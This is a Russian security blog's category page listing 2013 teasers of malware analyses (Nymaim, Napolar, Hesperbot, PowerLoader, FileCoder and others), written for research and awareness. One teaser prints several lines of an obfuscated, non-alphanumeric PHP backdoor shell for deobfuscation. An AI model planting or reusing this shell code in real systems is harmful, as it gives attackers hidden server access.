Первый компьютерный вирус

Автор: admin от 4-11-2013, 20:22, посмотрело: 8323

Ни для кого не секрет, что компьютерный вирус представляет собой вредоносную программу, которая способна к саморепликации, то есть размножению. Такие программы словно уголь для кальяна — их никто не видит, но все ощущают производимый ими эффект. Вирусы могут собирать различные данные с заражённых компьютеров или просто уничтожать их; могут блокировать какие-либо приложения или процессы; могут заставить компьютер выйти из строя.

Категория: Информационная безопасность » Вирусы и антивирусы

 

Win32/Nymaim — другой вектор заражения

Автор: admin от 24-10-2013, 13:11, посмотрело: 1771

Вредоносное ПО Win32/TrojanDownloader.Nymaim представляет из себя загрузчик троянской программы, который также содержит возможности вымогателя (ransomware) и может блокировать компьютер пользователя с целью выкупа. Мы уже писали о нем раньше и отмечали, что для распространения этой угрозы злоумышленники использовали компрометацию веб-серверов под управлением Linux с последующей доставкой вредоносного кода пользователям. Установка Nymaim на компьютеры пользователей осуществлялась с использованием набора эксплойтов Blackhole, автор которого недавно был арестован правоохранительными органами. Одно из последних исследований независимого ресерчера kafeine, которое основывается на анализе одной из панелей управления этого набора эксплойтов, показывает, что злоумышленники смогли заразить почти 3 млн. пользователей с начала проведения операции «The Home Campaign»...

Категория: Информационная безопасность » Вирусы и антивирусы

 

Деобфускация бэкдора без единого буквенно-цифрового символа

Автор: admin от 15-10-2013, 12:55, посмотрело: 1643

Месяц назад я увидел интересный пост про PHP-шелл без единого буквенно-цифрового символа и сильно захотел понять, что же он делает. Кому интересно — под кат!

Вот сам зловредный код
@$_[]=@!+_; $__=@${_}$_;$_[]=$__;$_[]=@_;$_[((++$__)+($__++ ))].=$_;
$_[]=++$__; $_[]=$_[--$__][$__$__];$_[$__].=(($__+$__)+ $_[$__-$__]).($__+$__+$__)+$_[$__-$__];
$_[$__+$__] =($_[$__][$__$__]).($_[$__][$__]^$_[$__][($__$__)-$__] );
$_[$__+$__] .=($_[$__][($__$__)-($__/$__)])^($_[$__][$__] );
$_[$__+$__] .=($_[$__][$__+$__])^$_[$__][($__$__)-$__ ];
$_=$ 
$_[$__+ $__] ;$_[@-_]($_[@!+_] );
...

Категория: Информационная безопасность » Вирусы и антивирусы

 

Менеджер загрузок Xunlei используется для скрытой установки приложений Android

Автор: admin от 15-10-2013, 09:35, посмотрело: 2057

В этом посте мы публикуем информацию о потенциально нежелательном ПО (Potentially Unwanted Application, PUA), компоненты которого обнаруживаются ESET как Win32/Kankan. Эти компоненты реализованы в менеджере загрузок Xunlei. Мы обратили внимание на это ПО из-за следующих интересных особенностей:


  • Для обеспечения своей скрытности и выживаемости в системе это ПО регистрирует один из своих компонентов как плагин для Microsoft Office
...

Категория: Информационная безопасность » Вирусы и антивирусы

 

Win32/Napolar — новый бот in-the-wild

Автор: admin от 2-10-2013, 08:08, посмотрело: 896

Недавно наши специалисты обнаружили новую вредоносную программу, которая была добавлена в антивирусные базы как Win32/Napolar. Мы обратили на нее внимание в середине августа из-за интересных методов антиотладки и внедрения кода. Бот используется злоумышленниками в нескольких целях: проведение DoS-атак, организация SOCKS прокси-сервера, кража данных с зараженных систем. Как и прочие троянские программы, Win32/Napolar умеет внедрять свой код в браузеры с целью получения данных из веб-форм...

Категория: Информационная безопасность » Вирусы и антивирусы

 

Семейства вымогателей FileCoder активизировались

Автор: admin от 25-09-2013, 04:57, посмотрело: 1968

Вредоносное ПО, которое шифрует файлы пользователей, а затем просит деньги за расшифровку, не является новым. Такие семейства получили общее название Filecoder и являются распространенным типом угроз — их называют вымогателями (ransomware). За последние несколько месяцев мы отметили значительный рост активности шифровальщиков FileCoder. Антивирусные продукты ESET обнаруживают эти угрозы как Win32/Filecoder и Win32/Gpcode...

Категория: Информационная безопасность » Вирусы и антивирусы

 

Банковский троян Hesperbot — детальный анализ

Автор: admin от 12-09-2013, 06:01, посмотрело: 936

Мы уже писали про Hesperbot, эта угроза представляет из себя новое банковское вредоносное ПО и имеет модульную архитектуру. Злоумышленники использовали его для проведения атак на пользователей различных стран, включая Турцию, Чехию, Португалию и Великобританию. Основной целью атак было похищение конфиденциальных данных онлайн-банкинга пользователей и установка мобильного компонента вредоносного кода на устройства под управлением Symbian, Android, Blackberry. Киберпреступники использовали убедительную схему фишинга для заманивания пользователей на вредоносные ссылки, что делало их подход еще более практичным...

Категория: Информационная безопасность » Вирусы и антивирусы

 

Ноль без палочки?

Автор: admin от 11-09-2013, 10:02, посмотрело: 1006

Опубликовано в журнале Хакер #171 (апрель 2013)

Со временем некоторые вредоносные программы становятся своеобразными брендами в среде киберандеграунда. Как правило, они имеют широкое распространение по сравнению с другими вредоносами и используют различные технологичные фишки. К таковым можно отнести семейства Sality, Conficker, Waledac, Zeus, TDL и множество других. Как бы ни боролись с такими угрозами антивирусные компании, как говорится — иногда они возвращаются. В логичности использования раскрученного имени злоумышленникам не откажешь. Разбирая функционал очередной «зверушки», невольно задаешь себе вопрос — а когда это все началось? И выясняется, что и ни год, и ни два назад. Об одном таком семействе и будет рассказано далее...

Категория: Информационная безопасность » Вирусы и антивирусы

 

PowerLoader 64-bit обновлен новыми LPE-эксплойтами

Автор: admin от 3-09-2013, 05:48, посмотрело: 723

Несколько месяцев назад мы писали о PowerLoader. Этот вредоносный код использует интересный метод повышения привилегий в контексте explorer.exe. Исходные тексты PowerLoader, которые оказались доступными для общественности, используются и в других семействах вредоносных программ. Например, дропперы буткита Win32/Gapz основаны на этом коде PowerLoader. В августе мы обнаружили новую модификацию PowerLoader для 64-битных ОС (обнаруживается ESET как Win64/Vabushky.A). Эта модификация использует три эксплойта для поднятия своих привилегий в системе (Local Privelege Escalation): MS13-053 (CVE-2013-3660), MS12-041 (CVE-2012-1864), и MS12-042 (CVE-2012-0217). Использование таких эксплойтов ранее не наблюдалось в семплах PowerLoader или родственных ему семействах. Александр Матросов выполнил анализ этого вредоносного ПО...

Категория: Информационная безопасность » Вирусы и антивирусы

 

Вымогатель Win32/Nymaim — хроники обфускации

Автор: admin от 29-08-2013, 05:45, посмотрело: 919

В прошлом месяце мы писали о кампании по распространению вредоносного ПО «Home Campaign». Злоумышленники на протяжении длительного времени компрометировали веб-серверы, работающие под управлением Apache Linux, используя при этом вредоносный модуль Apache известный как Darkeech (обнаруживается ESET как Linux/Chapro). Этот код использовался для перенаправления пользователей веб-сайтов на набор эксплойтов Blackhole Exploit Kit. В процессе анализа атаки выяснилось, что ее полезной нагрузкой было семейство вымогателей (ransomware) Win32/Nymaim. Данный анализ посвящен техническим особенностям этой вредоносной программы и способам ее установки на компьютеры пользователей...

Категория: Информационная безопасность » Вирусы и антивирусы